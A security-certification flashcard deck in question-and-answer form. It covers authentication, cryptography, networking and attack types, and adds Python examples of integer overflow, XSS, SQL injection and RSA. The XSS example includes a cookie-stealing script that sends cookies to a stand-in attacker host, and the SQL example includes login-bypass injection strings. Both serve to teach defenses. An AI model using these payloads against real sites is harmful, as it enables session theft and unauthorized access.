Which of the following refers to the use of several different factors to authenticate to a system?

Pass-through authentication
Single sign-on
Single-factor authentication
Multifactor authentication

A

Multifactor authentication

Correct Answer:
Multifactor authentication refers to the use of several different factors to authenticate to a system, such as something you know, something you are, and something you have. Multifactor authentication can be used in a single sign-on environment, but is not necessarily required.
Incorrect Answers:
Single-factor authentication uses only one factor, such as something you know, to authenticate to a system. It can also be used in a single sign-on environment but is not required.
Single sign-on is a method of authentication that enables a user to provide one set of credentials and use them throughout an interconnected network. Both Kerberos and SESAME protocols allow single sign-on.
Pass-through authentication can appear to be similar to single sign-on, but it requires all individual systems to accept credentials passed from another system without a unified approach.

353
Q

In many cases a load balancer uses which of the following on a client’s browser to maintain session affinity?

Client-based code
TLS
Cookies
Session lock

A

Cookies

Correct Answers:
Cookies are saved and used by load balancers to maintain a connection between a specific client and a specific server, i.e. session affinity.
Incorrect Answers:
TLS is an encryption protocol, and session lock is not a term used for load balancing.
Client-based code could be used, but is not common.

354
Q

Which type of cloud service is for use by only one organization and is usually hosted by that organization’s infrastructure?

Public
Community
Private
External

A

Private

Correct Answer:
A private cloud is for use by only one organization and is usually hosted by that organization’s infrastructure.
Incorrect Answers:
An external cloud is not a valid type of cloud and could be a public, private, or community cloud.
A community cloud is for use by similar organizations or communities, such as universities or hospitals, that need to share common data.
A public cloud is usually operated by a third-party provider that sells or rents “pieces” of the cloud to different entities, such as small businesses or large corporations.

355
Q

Which of the following terms describes someone who hacks into a system for malicious purposes, without permission from the system’s owner, and shares the system hacking information with others?

Gray hat hacker
Black box tester
Black hat hacker
White hat hacker

A

Black hat hacker

Correct Answer:
A black hat hacker is someone who uses her skills for malicious purposes and often shares that information with others.
Incorrect Answers:
A gray hat hacker uses her skills for both altruistic and malicious purposes, breaking into and exploiting a system without permission, but without sharing that information with others.
A black box tester is someone who tests a system without any prior knowledge of the network or infrastructure; this person tests the system with the owner’s permission.
A white hat hacker uses her skills to assist in securing systems; this type of hacker is usually a penetration testing professional or ethical hacker.

356
Q

The corporate IT manager wants you to implement a process that will allow administrators to restrict users from installing and executing certain applications on their mobile devices. Which of the following meets those goals?

Sandboxing
Blacklisting
Whitelisting
Containerization

A

Blacklisting

Correct Answer:
Blacklisting allows you to restrict users from installing and executing certain applications on their mobile devices.
Incorrect Answers:
Whitelisting allows an administrator to determine which applications and other software the user is allowed to install and execute.
Containerization is a technique used to separate different sensitivities of data, such as corporate and personal data, on a mobile device.
Sandboxing separates applications from each other and does not allow them to share execution, user, or data space.

357
Q

Which of the following attacks results in mathematical operations that the host or application cannot handle, causing them to fail?

Directory traversal attack
SQL injection attack
Integer overflow attack
LDAP injection attack

A

Integer overflow attack

Correct Answer:
An integer overflow attack is similar to a buffer overflow attack and results in mathematical operations that the host or application cannot handle, causing them to fail.
Incorrect Answers:
A SQL injection attack targets relational databases that reside behind Web applications.
An LDAP injection attack targets directory services databases, such as those used in X.500 implementations.
A directory traversal attack uses ../ sequences or absolute paths in user-supplied file names to reach files outside the directory the application intended to expose.
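The Python below is an added example, not from the card, of the arithmetic behind an integer overflow. It simulates what a 32-bit C program does when it computes `count * elem_size` for an allocation: the product silently wraps modulo 2**32, the buffer ends up far smaller than the copy that follows, and the result is a heap overflow. The checked version is the overflow-safe multiply a hardened program would use. The record count and element size are constructed values.

```python
UINT32_MAX = 0xFFFFFFFF


def buffer_size_unchecked(count, elem_size):
    """Models `uint32_t n = count * elem_size;` on a 32-bit build: the
    product silently wraps modulo 2**32 (Python ints do not, so mask explicitly)."""
    return (count * elem_size) & UINT32_MAX


def buffer_size_checked(count, elem_size):
    """Overflow-safe multiply: refuse any product that does not fit in 32 bits."""
    if count != 0 and elem_size > UINT32_MAX // count:
        raise OverflowError("count * elem_size would wrap")
    return count * elem_size


def simulate_copy(count, elem_size, checked):
    """Allocate room for `count` records of `elem_size` bytes, then copy
    count * elem_size bytes into it (as a loop over the records would).
    Returns (allocated_bytes, bytes_written, bytes_past_end)."""
    size_fn = buffer_size_checked if checked else buffer_size_unchecked
    allocated = size_fn(count, elem_size)   # what malloc() would be asked for
    to_write = count * elem_size            # what the copy loop actually writes
    return allocated, to_write, max(0, to_write - allocated)


if __name__ == "__main__":
    # An attacker-supplied record count chosen so that count * 4 == 2**32 + 4.
    count, elem_size = 0x40000001, 4
    print("unchecked:", simulate_copy(count, elem_size, checked=False))
    try:
        simulate_copy(count, elem_size, checked=True)
    except OverflowError as exc:
        print("checked:  ", exc)
```

With `count = 0x40000001` the unchecked program asks for a 4-byte buffer and then writes 4 GiB past it; the integer overflow is the cause and the buffer overflow is the effect, which is why the card calls the two "similar". Compilers and libraries offer the checked form directly (`__builtin_mul_overflow`, `calloc` with its internal overflow check), so the fix is usually a one-line change.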

358
Q

Which of the following methods will help improve SNMP security?

Ensure the monitoring station is protected by a firewall.
Close SNMP, TCP, and UDP port 161 on the client.
Change the “public” community name.
Disable ICMP.

A

Change the “public” community name.

Correct Answer:
Changing the default community string is the most important of the listed options: with the defaults left in place ("public" for read, and often "private" for read-write), anyone who can reach UDP port 161 can query, and possibly reconfigure, the device. Community strings in SNMPv1 and v2c travel in clear text, so in practice you should also move to SNMPv3 with authentication and privacy and restrict which management hosts may query the agent.
Incorrect Answers:
A firewall in front of the monitoring station does nothing to protect the SNMP agents on the managed devices.
Closing port 161 on the client disables SNMP entirely rather than securing it, and ICMP is unrelated.

359
Q

What type of evidence in a computer forensics investigation directly supports a particular assertion?

Demonstrative evidence
Inculpatory evidence
Documentary evidence
Exculpatory evidence

A

Documentary evidence

Correct Answer:
Documentary evidence directly supports or proves a definitive assertion.
Incorrect Answers:
Exculpatory evidence proves innocence.
Inculpatory evidence proves guilt.
Demonstrative evidence, which can be in the form of charts, graphs, drawings, and so forth, is used to help nontechnical people, such as the members of a jury, understand an event.

360
Q

Which mobile device management deployment model uses corporate-owned devices where the corporation dictates the software installation and maintenance actions?

COBO
CYOD
BYOD
COPE

A

COBO

Correct Answer:
Company Owned, Business Only (COBO) devices are owned and controlled completely by the organization.
Incorrect Answers:
Bring your own device (BYOD) means the employee owns the device.
Choose your own device (CYOD) means the organization retains ownership, but employees may install personal apps on the device.
Corporate-owned, personally enabled (COPE) is similar to CYOD, but employees are limited to installing only allow-listed apps.

361
Q

Which of the following is a legacy wireless encryption protocol that uses the RC4 streaming protocol?

WEP
WPA2
802.1X
WPA

A

WEP

Correct Answer:
WEP is a legacy wireless encryption protocol that has been shown to be very weak and is easily broken. It uses the RC4 stream cipher with a short 24-bit initialization vector (IV); because IVs repeat quickly on a busy network, keystream reuse lets an attacker recover the key from captured traffic.
Incorrect Answers:
WPA2 is a newer protocol that uses AES (CCMP).
WPA was an interim protocol used to correct some of WEP's weaknesses. It still uses RC4 but wraps it in TKIP, which rotates keys per packet.
802.1X is a port-based authentication framework, not a wireless encryption protocol.

362
Q

Which of the following types of injections use standardized database interfaces to attack a Web application?

MySQL injection
SQL injection
Relational injection
Hierarchical injection

A

SQL injection

Correct Answer:
SQL injection inserts unanticipated SQL syntax through application input so that the database behind the application executes it. The attack works against any database that speaks SQL, which is why it is named for the standardized query language rather than for a product.
Incorrect Answers:
MySQL is one specific SQL database product, not an attack type.
Relational injection and hierarchical injection are not real attack names.

363
Q

Which of the following describes a false acceptance rate? (Choose two.)

Type II error
The error caused when an unauthorized user is validated as authorized
The error caused from rejecting someone who is in fact an authorized user
Type I error

A

Type II error
The error caused when an unauthorized user is validated as authorized

Correct Answers:
A false acceptance rate (FAR) is the error caused when an unauthorized user is validated as authorized; it is also referred to as a Type II error.
Incorrect Answers:
A false reject rate (FRR) is the error caused from rejecting an authorized user; it is also called a Type I error.

364
Q

The United States Department of Defense uses a specific form of personal identification verification (PIV) card called?

RSA card
OTP card
CAC card
PAC card

A

CAC card

Correct Answer:
A Common Access Card (CAC) is the DoD's smart-card form of PIV credential; it carries certificates used for logon, signing, and encryption.
Incorrect Answers:
RSA is an asymmetric encryption algorithm, not a card type.
An OTP card generates one-time passwords (for example with HOTP, the HMAC-based one-time password algorithm), and physical access control (PAC) describes the mechanisms for admitting or denying people entry to a space.

365
Q

You?ve discovered that a number of systems within your network have become infected with malware; it?s believed that all the affected users visited a common site during the previous week. What type of attack would this likely be?

SQL injection
Poisoned DNS server
Watering hole attack
Spoofing

A

Watering hole attack

Correct Answer:
A watering hole attack compromises a site that the targeted users are known to visit, so that visiting it delivers malware to them.
Incorrect Answers:
The other options do not describe a common site delivering malware to all of its visitors.

366
Q

All of the following accurately describe the differences between TACACS and RADIUS EXCEPT:

TACACS uses TCP.

RADIUS encrypts only passwords between the client and server.

RADIUS uses UDP.

TACACS encrypts only passwords between the client and server.

A

TACACS encrypts only passwords between the client and server.

Correct Answer:
TACACS+ (the version in use today) encrypts the entire body of each packet between the client and server and uses TCP port 49, whereas RADIUS (UDP, typically ports 1812/1813) encrypts only the password attribute and sends the rest of the packet in cleartext.
Incorrect Answers:
The other three statements are accurate descriptions of the differences between RADIUS and TACACS+.

367
Q

When working with asymmetric encryption, which of the following is used to encrypt a message sent from Bob to Sue?

Sue’s private key
Sue’s public key
Bob’s public key
Bob’s private key

A

Sue’s public key

Correct Answer:
Sue’s public key is used to encrypt a message from Bob to Sue, as only Sue’s private key can decrypt it.
Incorrect Answers:
Sue’s private key can only decrypt the message, and Bob does not possess it.
Neither of Bob’s keys can be used to encrypt a confidential message to Sue.

368
Q

Which of the following identifies an example of two-factor authentication?

Password and PIN
Fingerprint and retina
Smartcard and PIN
Username and password

A

Smartcard and PIN

Correct Answer:
The use of a smartcard and PIN involves the use of two factors: something you have and something you know.
Incorrect Answers:
All of the other answers involve the use of only one factor: something you are or something you know, but not used together.

369
Q

Which of the following files might the hacker modify in order to redirect a user to the wrong web site?

ARP cache
services
lmhosts
hosts

A

hosts

Correct Answer:
The hosts file on a local machine maps hostnames to IP addresses and is consulted before DNS on most operating systems, so an attacker who can write to it can silently redirect a legitimate site name to a server he or she controls.
Incorrect Answers:
The lmhosts file is a Windows-specific file that maps computer names to IP addresses.
The services file lists well-known services, such as HTTP and FTP.
The ARP cache contains recently resolved local network IP addresses to MAC addresses.

370
Q

Which of the following simple command-line tools would be used from the host to determine what open ports a host is listening on?

ifconfig
ping
nbtstat
netstat

A

netstat

Correct Answer:
netstat is a tool found on both Unix/Linux and Windows hosts that can give network statistics and connection information, including port usage. This would help determine if a host is listening on an unexpected or unwanted port.
Incorrect Answers:
None of the other choices give information on open ports.
nbtstat is a command found only on Windows hosts and gives NetBIOS usage information.
Ping is found on both Unix/Linux and Windows hosts but only sends simple ICMP requests to a host.
ifconfig is found only on Unix and Linux hosts and only gives network interface configuration information.

371
Q

Which of the following algorithms is the stronger hashing algorithm?

AES-256
MD5
3DES
SHA-1

A

SHA-1

Correct Answer:
SHA-1 (Secure Hash Algorithm) generates a 160-bit digest and is the stronger of the two hashing algorithms offered. Both SHA-1 and MD5 are now considered broken for collision resistance (practical collisions exist for each), so new designs should use SHA-2 or SHA-3.
Incorrect Answers:
MD5 is a hashing algorithm that generates a 128-bit digest, which is weaker than SHA-1.
3DES and AES-256 are symmetric encryption algorithms, not hashing algorithms.

372
Q

Which of the following terms is defined as something that can cause harm to an asset?

Loss
Vulnerability
Threat
Risk

A

Threat

Correct Answer:
A threat is defined as an entity or event that has the potential to cause harm or damage to an asset. A threat could cause the organization to suffer a financial loss.
Incorrect Answers:
Risk is the possibility that a threat could harm an asset.
A vulnerability is a weakness in the system.
A loss is what damage occurs when a vulnerability is exploited by a threat.

373
Q

Which of the following attacks is NOT typically attempted by a rogue access point on a wireless network?

Spoofing
Evil twin
Interference
Brute force

A

Brute force

Correct Answer:
A brute-force attack is typically a password attack. It may be used separately to break wireless passwords but is not unique to wireless attacks.
Incorrect Answers:
All of these are attack methods that a rogue access point could attempt to engage in, resulting in a denial-of-service condition on the wireless network (as in the case of intentional interference), or by spoofing valid access points to entice an unsuspecting client to connect to it.

374
Q

You are configuring IPSec on your network and need to allow for security association (SA) traffic to pass through the firewall. Which of the following ports does the Internet Key Exchange (IKE) protocol, which is the protocol responsible for the SA setup within IPSec, use?

8080
500
22
443

A

500

Correct Answer:
IKE uses UDP port 500. When NAT traversal (NAT-T) is in use, IKE and the ESP payload are also carried over UDP port 4500, which must be opened too.
Incorrect Answers:
Port 443 is used by HTTPS (SSL/TLS), 22 is used by SSH, and 8080 falls outside the well-known range (0-1023) but is frequently used by proxy servers and other security devices.

375
Q

All of the following are advantages to using NAT, EXCEPT:

Internal network addresses are hidden from the public.

Firewalls and other security devices are not required.

Specific network traffic can be sent to a particular internal address and port.

Public IP addresses can be more effectively used by the organization.

A

Firewalls and other security devices are not required.

Correct Answer:
Even when using NAT, firewalls and security devices are required on a network boundary.
Incorrect Answers:
All of these are advantages to using NAT.

376
Q

Which type of intrusion detection system identifies suspicious activity by monitoring log files on the system?

ACL
NIDS
NIPS
HIDS

A

HIDS

Correct Answer:
A host-based intrusion detection system (HIDS) monitors local system activity and logs for indications of an attack.
Incorrect Answers:
A NIDS is a network-based intrusion detection system and does not monitor host log files.
A NIPS is a network-based intrusion prevention system and works on the network instead of the host.
An ACL is an access control list and is used to allow or deny traffic through a router or grant/deny permissions to resources.

377
Q

Which of the following is the best way to prevent cross-site scripting attacks?

Block ports 443 and 80 on the firewall

Restrict CGI script execution
Require certificate-based authentication for web site access

Validate the input into a web site for illegal characters in a particular field

A

Validate the input into a web site for illegal characters in a particular field

Correct Answer:
Validating input (rejecting or constraining characters such as <, >, ", ' and & in a field) is the best choice among those offered for preventing cross-site scripting (XSS). In practice, input validation is paired with output encoding, which renders whatever does reach the page as text rather than as markup.
Incorrect Answers:
Blocking ports 443 and 80 would make the site unreachable, since these are the standard HTTPS and HTTP ports.
Requiring certificate-based authentication identifies the user but does nothing about script injected into the page's content.
Restricting CGI script execution does not address XSS, which is delivered through the application's own pages rather than through CGI.
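An added example, not from the original deck, of the two controls just described: a comment renderer that interpolates raw input (vulnerable) beside one that validates a constrained field against an allowlist and HTML-encodes everything on output. The field names, the allowlist policy, and the sample payload are constructed for the illustration.

```python
# Added example (not from the flashcard deck): XSS-vulnerable rendering
# versus input validation plus output encoding.
import html
import re

# Allowlist for a constrained "display name" field: letters, digits, spaces
# and a few punctuation marks. The field and its policy are assumptions.
DISPLAY_NAME_RE = re.compile(r"^[A-Za-z0-9 .,'-]{1,40}$")


def render_comment_vulnerable(name: str, body: str) -> str:
    """Interpolates raw user input into HTML: attacker-controlled markup is
    sent to every browser that views the page and executes there."""
    return f"<p><b>{name}</b>: {body}</p>"


def validate_display_name(name: str) -> bool:
    """Reject any display name with characters outside the allowlist (e.g. < > \" &)."""
    return DISPLAY_NAME_RE.fullmatch(name) is not None


def render_comment_safe(name: str, body: str) -> str:
    """Validate the constrained field, then HTML-encode both fields on output.

    Raises ValueError on an invalid name. The free-text body cannot be
    allowlisted as tightly, so output encoding is what neutralises it.
    """
    if not validate_display_name(name):
        raise ValueError("display name contains disallowed characters")
    return (f"<p><b>{html.escape(name, quote=True)}</b>: "
            f"{html.escape(body, quote=True)}</p>")


if __name__ == "__main__":
    # Constructed payload: a classic cookie-stealing script tag.
    payload = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    print(render_comment_vulnerable("alice", payload))  # script tag reaches the browser intact
    print(render_comment_safe("alice", payload))        # &lt;script&gt;... is displayed as text
    print(validate_display_name("<img src=x onerror=alert(1)>"))  # False: rejected at input
```

Note that `html.escape` is the right encoder only for HTML element content and quoted attribute values; input placed into JavaScript, URLs, or CSS needs the encoder for that context.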

378
Q

Which of the following protocols uses IPSec to ensure confidentiality?

PPTP
SSL
PPP
L2TP

A

L2TP

Correct Answer:
IPSec provides encryption services for L2TP when used in a VPN implementation.
Incorrect Answers:
None of these protocols use IPSec for encryption services.

379
Q

Which of the following attacks involves sending ICMP packets from a spoofed IP address to the network's broadcast address?

Botnet
RAT
Watering hole attack
Smurf attack

A

Smurf attack

Correct Answer:
A smurf attack sends ICMP echo requests, with the victim's address spoofed as the source, to a network's broadcast address; every host on that network replies to the victim, amplifying the traffic into a denial of service. Because many hosts unwittingly participate, it is an example of a reflected, amplified DDoS attack.
Incorrect Answers:
A remote access Trojan (RAT) is malicious software that the user typically installs without knowing it, such as by installing a game from the Internet or by running a program that was e-mailed to them that is malicious software. The RAT program then opens a back door for the hacker to gain access to the system remotely at a later time.
A botnet is a group of compromised systems that the hacker has control over and uses to attack a victim’s system.
A watering hole attack is when the hacker determines sites you may want to visit and then compromises those sites by planting viruses or malicious code on them. When you visit the site (which you trust), you are then infected with the virus.

380
Q

Which of the following wireless attacks specifically attempts to take control of or use Bluetooth-enabled cell phones to make unauthorized calls?

Bluejacking
Bluesnarfing
Bluesniffing
Bluebugging

A

Bluebugging

Correct Answer:
Bluebugging, the most serious of the various Bluetooth attacks, involves an attacker taking control of a Bluetooth-enabled phone to place calls, send messages, or eavesdrop.
Incorrect Answers:
Bluejacking is the act of sending unsolicited messages or files to a Bluetooth device.
Bluesnarfing is a more serious attack than bluejacking and involves unauthorized access to information on a Bluetooth-enabled device.
Bluesniffing is not the name of a recognized Bluetooth attack.

381
Q

Which authentication technology makes use of a key distribution center composed of an authentication server and a ticket-granting service?

Sesame
RADIUS
Kerberos
Single sign-on

A

Kerberos

Correct Answer:
Kerberos uses a key distribution center (KDC), which consists of an authentication server and a ticket-granting service.
Incorrect Answers:
None of these choices is associated with these terms.

382
Q

When a user types his or her username into a logon screen, this is known as ___________?

Impersonation
Authentication
Identification
Authorization

A

Identification

Correct Answer:
Identification is the first step in the process: the user presents a claimed identity, such as a username, to the system.
Incorrect Answers:
Authentication occurs after identification and involves the system verifying the user's credentials (password, token, biometric) to prove the claimed identity.
Authorization refers to granting an authenticated user the correct access to an object.
Impersonation is an invalid term in this context.

383
Q

Which device, when implemented with VLANs, can help reduce both collision and the size of broadcast domains?

Router
Hub
Switch
Bridge

A

Switch

Correct Answer:
Switches natively help reduce collision domains and, when VLANs are implemented on them, help reduce broadcast domains.
Incorrect Answers:
Routers can help reduce or eliminate broadcast domains, and bridges can help reduce collision domains, but neither of these devices use VLANs.
Hubs do not reduce collision or broadcast domains.

384
Q

Which type of malware is difficult to detect and replaces key operating system files?

Logic bomb
Trojan
Rootkit
Worm

A

Rootkit

Correct Answer:
A rootkit is very difficult to detect and often replaces key operating system files with compromised versions, allowing an attacker to access administrative-level functions.
Incorrect Answers:
A worm is a self-propagating piece of malware that can spread without user intervention.
A Trojan is a piece of malware that disguises itself as useful software.
A logic bomb is a malicious script that typically activates after a certain date or event.

385
Q

Which of the following networking technologies provides for local area network segregation using switches?

RADIUS
VPN
Virtualization
VLAN

A

VLAN

Correct Answer:
VLANs (virtual LANs) provide for local area network segmentation and separation and are implemented on switches.
Incorrect Answers:
RADIUS is a remote access authentication technology.
Virtualization refers to the creation and management of virtual hosts running in a virtualized environment.
VPN is a secure remote access technology.

386
Q

Which of the following techniques involves sending unexpected or invalid data to an application to determine vulnerabilities?

Cracking
Fuzzing
Spoofing
Scanning

A

Fuzzing

Correct Answer:
Fuzzing is an application vulnerability testing technique that sends invalid or unexpected data to the application, with the intent to see if any security vulnerabilities exist.
Incorrect Answers:
Cracking typically involves passwords, not applications.
Scanning usually means network port or service scanning.
Spoofing means to masquerade as another entity, usually by spoofing an IP address, MAC address, or user.

387
Q

All of the following are considered secure password creation practices EXCEPT:

Passwords must not use common dictionary-based words.

Passwords must be of sufficient length.

Passwords must use a mixture of uppercase, lowercase, numbers, and special characters.

Passwords must include the userid.

A

Passwords must include the userid.

Correct Answer:
A password should not include the user's userid, because it is the first thing an attacker who knows the account name will try.
Incorrect Answers:
All of these practices contribute to a secure password.

388
Q

Which of the following is the most volatile source of evidence and should be collected first during a computer forensics investigation?

Hard disks
CD/DVDs
Swap file
RAM

A

RAM

Correct Answer:
RAM is the most volatile source of information and is easily lost. It must be collected first during a computer forensics investigation.
Incorrect Answers:
The order of volatility, and order of evidence collection, is RAM, swap file, hard disk, and CD/DVDs.

389
Q

A common attack on databases through a web-based form is called:

Directory traversal
Cross-site scripting
SQL injection
XML injection

A

SQL injection

Correct Answer:
SQL injection is a common attack on databases through a web-based form, where the attacker injects SQL commands into the form input.
Incorrect Answers:
Cross-site scripting injects client-side script into a web page so that it runs in other users' browsers.
XML injection is an attack that injects faulty or malicious XML into an XML statement.
Directory traversal uses "../" sequences to reach files outside the web server's intended directory.
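The attack described here (and in the earlier SQL injection card), as an added example that is not part of the original deck: a login check that builds its query by string formatting beside the parameterized version, run against a small in-memory SQLite table constructed for the illustration. The table, the sample users, and the placeholder "hashes" are assumptions.

```python
# Added example (not from the flashcard deck): SQL injection through a login
# form, and the parameterised query that defeats it. Uses SQLite in memory.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: two users with placeholder password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwhash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hash-of-alice-pw"), ("bob", "hash-of-bob-pw")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, pwhash: str) -> list:
    """Builds the statement with string formatting, so form input becomes SQL syntax."""
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND pwhash = '{pwhash}'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn: sqlite3.Connection, username: str, pwhash: str) -> list:
    """Parameterised query: the driver sends values separately from the
    statement, so quotes and comment markers in the input stay data."""
    query = "SELECT username FROM users WHERE username = ? AND pwhash = ?"
    return [row[0] for row in conn.execute(query, (username, pwhash))]


if __name__ == "__main__":
    conn = make_db()
    # Constructed attack 1: close the string and comment out the password check.
    injected = "alice' --"
    print(login_vulnerable(conn, injected, "wrong"))  # ['alice']: logged in without the hash
    print(login_safe(conn, injected, "wrong"))        # []: no user literally named "alice' --"
    # Constructed attack 2: tautology that returns every row.
    print(login_vulnerable(conn, "' OR '1'='1", "' OR '1'='1"))  # ['alice', 'bob']
    print(login_safe(conn, "' OR '1'='1", "' OR '1'='1"))        # []
```

Parameterisation (prepared statements) fixes the root cause: the query's structure is fixed before any user data is bound. Input validation on the form is still worthwhile, but on its own it is a blocklist that attackers routinely bypass with encoding variations.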

390
Q

When users connect to the wireless network, management wants them to receive a message asking them to agree to the terms of use before being granted wireless network access. What network service could be used to perform this goal?

NAC
Multifactor authentication
PKI
Kerberos

A

NAC

Correct Answer:
Network access control (NAC) can be used to enforce logon or connection banners that will require users to agree to terms of use before being allowed to connect to the network.
Incorrect Answers;
None of these other technologies can be used to enforce logon warning banners requiring users to agree to terms of use before being allowed to access the network.

391
Q

Your manager has read a lot about server virtualization and is wondering if there are any security benefits to using server virtualization. How would you respond?

More work required to harden systems
Decentralized server security
Fewer systems to physically secure
Larger hardware footprint

A

Fewer systems to physically secure

Correct Answer:
Virtualization results in fewer physical systems (and less hardware) that must be secured.
Incorrect Answers:
None of the other choices offer any benefits, security or otherwise, of virtualization.

392
Q

Which of the following protocols is a more secure version of the SSL protocol?

AES
RSA
SSH
TLS

A

TLS

Correct Answer:
Transport Layer Security (TLS) is considered a strong replacement for SSL.
Incorrect Answers:
SSH is a secure replacement for Telnet and other nonsecure protocols.
AES is a symmetric algorithm that replaces DES.
RSA is an asymmetric algorithm used in public key cryptography.

393
Q

Which of the following application attacks allows attackers to inject client-side script into web pages viewed by other users?

SQL injection
Buffer overflow
Cross-site scripting
XML injection

A

Cross-site scripting

Correct Answer:
Cross-site scripting (XSS) enables attackers to inject client-side scripts into web pages viewed by others.
Incorrect Answers:
XML injection occurs when malicious XML code is inserted into an XML statement.
SQL injection involves inserting faulty SQL input commands into a site that connects to a database, producing unintended results or returning privileged information.
A buffer overflow takes advantage of programming flaws that occur when data overwrites a program's allocated memory, and can enable arbitrary code to be executed at that address.

394
Q

The network administrator for your office has configured the company web site for SSL by applying a certificate to the site. What port will you need to open on the firewall to allow communication to the site?

443
80
53
22

A

443

Correct Answer:
TCP port 443 must be opened on the firewall to allow HTTPS (SSL/TLS) traffic to reach the site.
Incorrect Answers:
Port 80 is cleartext HTTP, 53 is DNS, and 22 is SSH; none of them carries the SSL-protected site traffic.

395
Q

You are performing a site survey of a company location and notice that one of the wireless access points is on top of a bookshelf that is located by the outer wall of the building. What is the security concern?

Interference
Signal degradation
Wireless network access by persons outside the building
Damage due to falling

A

Wireless network access by persons outside the building

Correct Answer:
Because of the placement near the outer wall, the wireless access point’s signals could be detected outside the building and could allow an unauthorized user to eavesdrop on or use the connection.
Incorrect Answers:
Damage due to falling is a concern, but not the most immediate security concern.
Interference could happen only if other wireless devices nearby transmit on frequencies close to the one the access point uses; that is a performance concern, not typically a security concern unless it is malicious and intended to cause a denial-of-service condition.
Signal degradation for the rest of the facility would not be caused by placing the access point next to the outer wall.

396
Q

Which authentication protocol uses Microsoft Point-to-Point Encryption (MPPE) protocol to encrypt all traffic from the client to the server?

MS-CHAP
EAP
CHAP
Kerberos

A

MS-CHAP

Correct Answer:
Microsoft CHAP (MS-CHAP) uses Microsoft Point-to-Point Encryption (MPPE) protocol to encrypt all traffic from the client to the server.
Incorrect Answers:
Neither EAP nor Kerberos uses MPPE.
CHAP is the nonproprietary version and uses MD5 as its hashing algorithm.

397
Q

Your manager has asked that you perform an assessment of user passwords on the servers but wants to ensure that when you test the passwords you do not lock the user accounts. Which type of password audit should you perform?

Account lockout audit
White-box penetration test
Online password audit
Offline password audit

A

Offline password audit

Correct Answer:
If the goal is to prevent user account lockout, then offline password auditing is the correct method.
Incorrect Answers:
Online auditing submits guesses against the live logon service and will lock out user accounts as soon as the account lockout threshold is reached.
An account lockout audit is an invalid type of audit, and a white-box penetration test involves full system or network testing and is incorrect in this context.

398
Q

Which of the following keys is used for nonrepudiation?

Hash
Public key
Symmetric key
Private key

A

Private key

Correct Answer:
For nonrepudiation the signer applies his or her private key to a hash of the message (in textbook RSA this is described as encrypting the hash with the private key). Anyone holding the matching public key can verify the result, and because only the owner has the private key, the owner cannot plausibly deny having signed. Used this way the private key provides nonrepudiation, not confidentiality: the public key, and therefore the ability to verify, is available to everyone.
Incorrect Answers:
Symmetric keys and hashes do not provide nonrepudiation, because a shared key or an unkeyed hash cannot prove which party produced a message or performed an action.
Public keys can be in the possession of anyone and are used here only to verify that the private key produced the signature.
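Both asymmetric-key cards above (Bob encrypting to Sue with her public key, and a signer using the private key for nonrepudiation) in one added example that is not part of the original deck. It is textbook RSA built from Python's built-in big integers with Mersenne primes as toy key material; the primes, the names and the messages are assumptions for the illustration, and real systems use OAEP padding for encryption and PSS or PKCS#1 v1.5 for signatures, never raw RSA.

```python
# Added example (not from the flashcard deck): textbook RSA showing
# encrypt-with-recipient's-public-key and sign-with-sender's-private-key.
import hashlib
from math import gcd

# Toy key material: Mersenne primes (2**521-1, 2**607-1, 2**1279-1, 2**127-1)
# chosen only so that the modulus is larger than a SHA-256 digest and the
# example runs with the standard library alone. Not for real use.


def generate_keypair(p: int, q: int, e: int = 65537):
    """Return (public_key, private_key) as (n, e) and (n, d)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    assert gcd(e, phi) == 1
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def encrypt(public_key, message: bytes) -> int:
    """Bob encrypts for Sue with *Sue's* public key; only Sue's private key undoes this."""
    n, e = public_key
    m = int.from_bytes(message, "big")
    if m >= n:
        raise ValueError("message too long for this modulus")
    return pow(m, e, n)


def decrypt(private_key, ciphertext: int) -> bytes:
    """Sue recovers the message with her private key (leading zero bytes are lost)."""
    n, d = private_key
    m = pow(ciphertext, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def sign(private_key, message: bytes) -> int:
    """Nonrepudiation: the signer applies the private key to a hash of the message."""
    n, d = private_key
    h = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return pow(h, d, n)


def verify(public_key, message: bytes, signature: int) -> bool:
    """Anyone with the public key can check the signature; only the private-key holder could have made it."""
    n, e = public_key
    h = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return pow(signature, e, n) == h


if __name__ == "__main__":
    sue_pub, sue_priv = generate_keypair(2**521 - 1, 2**607 - 1)
    bob_pub, bob_priv = generate_keypair(2**1279 - 1, 2**127 - 1)

    msg = b"meet at noon"                      # constructed message from Bob to Sue
    c = encrypt(sue_pub, msg)                  # confidentiality: Sue's public key
    print(decrypt(sue_priv, c))                # b'meet at noon'

    sig = sign(bob_priv, msg)                  # nonrepudiation: Bob's private key
    print(verify(bob_pub, msg, sig))           # True
    print(verify(bob_pub, b"meet at one", sig))  # False: message altered
    print(verify(sue_pub, msg, sig))           # False: wrong signer
```

Confidentiality and nonrepudiation use the key pair in opposite directions: encryption goes to the recipient's public key, signing comes from the sender's private key. In a real deployment the two purposes also use separate key pairs.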

399
Q

Which of the following terms refers to the practice of stealing or obtaining a user's personal or account information, typically using voice over IP (VoIP) systems?

Vishing
VoIP hijacking
Phishing
Whaling

A

Vishing

Correct Answer:
Vishing (a combination of the terms voice and phishing) refers to social engineering attacks that make use of VoIP systems to spoof phone numbers, hide caller IDs, and so forth, to obtain personal or account information from unsuspecting users.
Incorrect Answers:
Phishing involves the use of e-mail targeted to users with a malicious web site link embedded in the e-mail.
Whaling involves specifically targeting senior-level executives of an organization for social engineering attacks.
VoIP hijacking is a nonexistent term in this context.

400
Q

Which of the following choices concerns itself with ensuring that data is not modified or destroyed while in storage or transit?

Confidentiality
Nonrepudiation
Integrity
Availability

A

Integrity

Correct Answer:
Integrity is concerned with ensuring that data is not modified.
Incorrect Answers:
Confidentiality protects information from unauthorized access.
Availability provides for information and systems to be online and ready for users at any time.
Nonrepudiation means that a user cannot deny that he or she took an action.

401
Q

Which of the following best describes a minimum password age setting?

